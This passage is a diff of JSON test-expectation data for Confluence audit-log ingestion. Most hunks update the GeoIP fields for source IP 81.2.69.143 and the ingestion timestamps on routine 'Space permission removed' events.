removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8340,20 +7842,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8361,7 +7857,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222530663Z", + "ingested": "2021-12-14T14:34:31.513237072Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.254Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8434,20 +7930,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8455,7 +7945,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222532545Z", + "ingested": "2021-12-14T14:34:31.513237512Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.250Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8528,20 +8018,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8549,7 +8033,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222534474Z", + "ingested": "2021-12-14T14:34:31.513237898Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.246Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8622,20 +8106,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8643,7 +8121,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222536371Z", + "ingested": "2021-12-14T14:34:31.513238292Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.242Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8709,20 +8187,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8730,7 +8202,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222538242Z", + "ingested": "2021-12-14T14:34:31.513238682Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.238Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8803,20 +8275,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8824,7 +8290,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222540141Z", + "ingested": "2021-12-14T14:34:31.513239064Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.234Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8897,20 +8363,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8918,7 +8378,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222542013Z", + "ingested": "2021-12-14T14:34:31.513239467Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.230Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8991,20 +8451,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9012,7 +8466,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222543907Z", + "ingested": "2021-12-14T14:34:31.513239902Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.225Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9078,20 +8532,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9099,7 +8547,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222545801Z", + "ingested": "2021-12-14T14:34:31.513240294Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.221Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9172,20 +8620,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9193,7 +8635,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222547675Z", + "ingested": "2021-12-14T14:34:31.513240700Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.217Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9266,20 +8708,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9287,7 +8723,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222549556Z", + "ingested": "2021-12-14T14:34:31.513241096Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.212Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9360,20 +8796,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9381,7 +8811,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222551441Z", + "ingested": "2021-12-14T14:34:31.513241509Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.208Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9447,20 +8877,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9468,7 +8892,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222553328Z", + "ingested": "2021-12-14T14:34:31.513241956Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.204Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9541,20 +8965,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9562,7 +8980,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222555204Z", + "ingested": "2021-12-14T14:34:31.513242393Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.200Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9635,20 +9053,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9656,7 +9068,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222557094Z", + "ingested": "2021-12-14T14:34:31.513242912Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.194Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9729,20 +9141,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9750,7 +9156,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222558972Z", + "ingested": "2021-12-14T14:34:31.513243304Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9816,20 +9222,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 